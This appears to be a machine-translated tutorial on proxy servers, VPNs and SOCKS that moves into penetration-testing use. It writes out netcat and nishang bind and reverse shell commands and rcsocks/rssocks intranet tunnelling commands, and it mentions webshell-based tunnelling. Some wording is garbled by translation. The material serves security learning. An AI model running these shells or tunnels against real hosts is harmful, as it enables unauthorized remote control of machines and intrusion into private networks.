Learning about proxy servers

1. Proxy Server and VPN

1. Working principle

(1) The working principle of the agent is:

The proxy server itself accesses your target website, loads its content, and then delivers the loaded content to your window. This is equivalent to you browsing the target website. Therefore agents are often called "ladders" or "bridges".

(2) How VPN works:

The data you transmit is encrypted by the VPN software and passed to the VPN server so that the transmitted data is unreadable to the interceptor (tunneling technology).
Note: The main difference between the two is that proxies are designed for basic functionality, such as bypassing geo-restrictions, but they are not as secure. VPNs, on the other hand, encrypt and protect all data. While a VPN is different from a proxy, they can be used together to enhance anonymity.

2.Proxy server type

(1 ) HTTP proxy :

It can proxy the client's HTTP access. We use http proxy when browsing web pages and downloading data.

(2 ) HTTPS proxy :

The HTTPS protocol is established by the SSL+HTTP protocol. It is a network protocol that can encrypt the transmission process and is more secure than the HTTP protocol for file transmission. HTTPS and SSL support the use of X.509 digital authentication, allowing users to confirm who the sender is if needed.

(3 ) SOCKS proxy :

A proxy server that uses the SOCKS protocol is a SOCKS server, which is a universal proxy server.
Socks all-purpose proxy, its standard port is 1080, supports multiple protocols , including http , ftp requests and other types of requests. Socks proxy is different from application layer proxy and HTTP layer proxy. Socks proxy simply transmits data packets without having to care about the application protocol, so it is faster and easier. If you are on a corporate network or campus network and need to access the Internet through a firewall or a proxy server, you may need to use SOCKS. It is divided into two types: socks 4 and socks 5. This is a general proxy server that plays the role of a request agent in network communications. During intranet penetration, by building a sOCKS proxy, you can communicate with the target intranet host and avoid using port forwarding multiple times.
SOCKS4: Only supports TCP protocol (i.e. Transmission Control Protocol)
SOCKS5: Supports both TCP protocol and UDP protocol (i.e. User Data Packet Protocol)

3.Agency method

1. Global agent:

Most network requests on your computer go through the Magic Internet tool

2. Rule Agent (PAC):

This mode determines whether the request needs to go through a proxy based on the PAC file.

3. Direct agent:

Set the proxy information of a program individually to connect directly to the proxy server.

4. Implement tools and commands

First, learn to think about forward and reverse connections with an attacker's mindset.

Forward connection:

Forward connection is a process in which the controlled host (target machine) listens to a port, and the control host (attack machine) actively connects to the controlled host. It is suitable for situations where the controlled host (target machine) has a public IP. . Both the Attacker and Victim hosts have public IP addresses. The Attacker can directly access Victim through the IP address, so it can use forward connections to control Victim.
Reverse connection:

(The attack machine) monitors a port, and the controlled host (target machine) reversely connects to the controlling host. This process is suitable for situations where the controlled host (target machine) does not have a public IP. Victim is a host located on the intranet and does not have a public IP address. Attacker cannot access Victim directly through the IP address. Therefore, you need to listen to a port on the Attacker at this time and let Victim connect to the Attacker in reverse, so as to control Victim.
In penetration testing, forward connections are often limited by firewall blocking and insufficient permissions on the controlled host. And reverse connections can break through these limitations very well.

1. Tool name: Netcat

Introduction:
A stable backdoor tool that can be easily driven directly by other programs and scripts. Read and write data through a network connection using TCP or UDP protocols. At the same time, it is also a powerful network debugging and detection tool that can establish almost all types of network connections you need. The supported proxy protocols are "4" (SOCKS v.4), "5" (SOCKS v.5), and "connect" (HTTPS proxy). SOCKS v.5 is used by default.
Commonly used commands:

(1) Forward connection:

The target machine monitors (/bin/sh can be understood as the soft connection of /bin/bash): nc lvvp [port] -e /bin/sh
the attacking machine uses nc to connect:nc [ip] [port]

(2) Reverse connection:

Attack machine monitoring: nc -lvvp [port]
target and rebound shell:nc -t -e c:winntsystem32cmd.exe [ip] [port]

2. Tool name: nishang

Introduction:
Nishang is a penetration tool for PowerShell. The use of nishang can only be used normally in an environment of PowerShell 3.0 or above. (You can use the Get-Host command to view the current version of powershell) Invoke-PowerShellUdp Powershell interactive forward connection or reverse connection shell, based on UDP protocol. In addition, Invoke-PoshRatHttp and Invoke-PoshRatHttps are Powershell interactive reverse connection shells, based on the HTTP protocol and HTTPS protocol. (Not demonstrated)
Common commands:

(1) Forward connection (based on UDP, nc command needs to be modified):

The target machine uses the nishang tool to monitor: Invoke-PowerShellUdp -blind -port 86
the attacking machine uses nc to connect: nc -nvu 192.168.190.159 86
the attacking machine enters the nishang interface of powershell

(2) Reverse connection

Attack machine monitoring: nc -lup 86
target machine rebound shell:Invoke-PowerShelludp -Reverse -IPADDress [ip] -port 86

3. Tool name: reGeorg

Tool address: https://github.com/sensepost/reGeorg
Introduction:
reGeorg is an upgraded version of reDuh. It mainly forwards the port of the intranet server to the local machine through the http/https tunnel to form a loop. Used for the target server to connect to the internal open port of the target server when it is on the intranet or has a port policy. It uses webshell to establish a socks proxy for intranet penetration. The server must support one of the web programs such as aspx, php or jsp.

4. Tool name: sSocks

Tool address: http://sourceforge.net/projects/ssocks/
Introduction:
sSocks is a socks proxy tool suite, which can be used to enable socks proxy service, supports socks5 verification, supports IPV6 and UDP, and provides reverse socks proxy service. It will be launched soon. The remote computer acts as a socks proxy server and bounces back to the local computer, which greatly facilitates penetration testing of the intranet. The latest version is 0.0.14, download it, unzip it, and execute the command to compile it.
./configure && make
Enter the src directory and you will find nsocks, ssocksd, ssocks, and rcsocks. Their function descriptions are as follows:
nsocks is similar to netcat through the Socks5 proxy and can be used to test the socks server. ssocksd is used to open the Socks5 proxy service ssocks. Enable locally. Socks5 service and bounce to another IP address rcsocks receives the bounced Socks5 service and redirects to another port.
Execute on the public network host:
./rcsocks -l 4444 -p 5555 -vv
Execute on the intranet host:
./rssocks –vv –s 公网主机ip:5555
At this time, the local host can access the intranet by accessing port 4444 of the public network host. web host.

5.frp

Tool address: https://github.com/fatedier/frp/releases
frp is an open source, simple and easy-to-use, high-performance intranet penetration and reverse proxy software that supports tcp, udp, http, https and other protocols.
frp experiment: frp